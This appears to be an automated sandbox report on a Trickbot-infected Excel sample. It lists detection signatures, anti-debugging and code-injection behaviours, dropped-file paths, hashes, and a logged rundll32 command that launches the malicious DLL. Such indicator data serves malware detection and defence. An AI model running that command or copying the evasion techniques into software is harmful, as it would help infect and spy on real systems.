Source: hsdksksk.iem.0.dr	Binary or memory string: INTERNALNAMESNIFFER.EXE

Found dropped PE file which has not been started or loaded

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmons[1].dll

Jump to dropped file

Anti Debugging:

Contains functionality to dynamically determine API calls

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_003A1030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,

4_2_003A1030

Contains functionality to read the PEB

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_002C095E mov eax, dword ptr fs:[00000030h]	4_2_002C095E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_002C0456 mov eax, dword ptr fs:[00000030h]	4_2_002C0456
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_003A1030 mov eax, dword ptr fs:[00000030h]	4_2_003A1030

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_003A1030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,

4_2_003A1030

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\hsdksksk.iem,StartW			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe			Jump to behavior

Stealing of Sensitive Information:

Yara detected Trickbot

Source: Yara match	File source: 00000004.00000002.2100678651.0000000000470000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2100567095.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2100613239.00000000003A4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2100649939.00000000003E1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 4.2.rundll32.exe.3e0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.2c052e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.2c052e.1.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected Trickbot

Source: Yara match	File source: 00000004.00000002.2100678651.0000000000470000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2100567095.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2100613239.00000000003A4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2100649939.00000000003E1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 4.2.rundll32.exe.3e0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.2c052e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.2c052e.1.unpack, type: UNPACKEDPE

ID:	412857
Product:	CloudBasic
Start time:	01:48:22
Start date:	13.05.2021
Sample:	SecuriteInfo.com.Heur.32219.22782
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	1ce9bb4784ef70cd5d09291a5005ab51
SHA1:	f4c3e4d7be3e6855c0272b0c2f3a2833bd6963a1
SHA256:	dfae46a2c8083b6cf4f91691289ca97cbcc002126058a2900f09564edccffdfb
Filetype:	Microsoft Excel sheet (30009/1) 78.94%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmons[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	3BB9FE6B7E6B4D9C3A3C83DE6AACD952	57C343AE5E95FE702B759737522E85FE9E97FE5E	697DEA4B154178E8DE096C66167B539AA4465155D294B11765F1A1886EB7C56D
C:\Users\user\AppData\Local\Temp\71EE0000	data	D142FA450F0F0D3B7B50CA21E9FB3004	5E6B41E41041641F4841C4A5BC3C4EBD1050EB05	425F91DACC94180825D3E42B226F03524A52ADC0782F3EE43DAC3AB3554837E0
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Thu May 13 07:48:43 2021, atime=Thu May 13 07:48:43 2021, length=8192, window=hide	CF89FECF15B4AFD2F6C3847707E24D8E	C640AF43927C1E78563A6E624B5C470305155186	E9DFC2AD8DBB30BDFFD57BBE39794CFA8A32D8A31EF2F429774DC858626AE332
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\SecuriteInfo.com.Heur.32219.LNK	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu May 13 07:48:30 2021, mtime=Thu May 13 07:48:43 2021, atime=Thu May 13 07:48:43 2021, length=107520, window=hide	1190531A9E1F2D3B7DF1EC5931401519	EE288D9AD34AE5411810D8675607C89D7E6516BC	714B6DCA9C727F05F47995E883C12972F5F5EE35A457514245E0C2ABF524AB09
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat	ASCII text, with CRLF line terminators	CA5CCBB60A8F1D7106F009189FDAA89A	8403283EB886BBE8CDDE5EBAE93A404E95DD60C2	B21B9338FAFD2534E092A29CBD91C6191B752893052C91D9D8E0E39A5EF4F70A
C:\Users\user\Desktop\42EE0000	Applesoft BASIC program data, first line number 16	4D3A0B0125D561E5232043E09932F88E	A211B5D29B2EE1E594E4084282B9522473EABE42	20AB1224A546FF43AF9CC99BE30A8A89519679CB0709FF3674B00AA6E704DA0F
C:\Users\user\hsdksksk.iem	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	3BB9FE6B7E6B4D9C3A3C83DE6AACD952	57C343AE5E95FE702B759737522E85FE9E97FE5E	697DEA4B154178E8DE096C66167B539AA4465155D294B11765F1A1886EB7C56D

Analysis Report SecuriteInfo.com.Heur.32219.22782

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs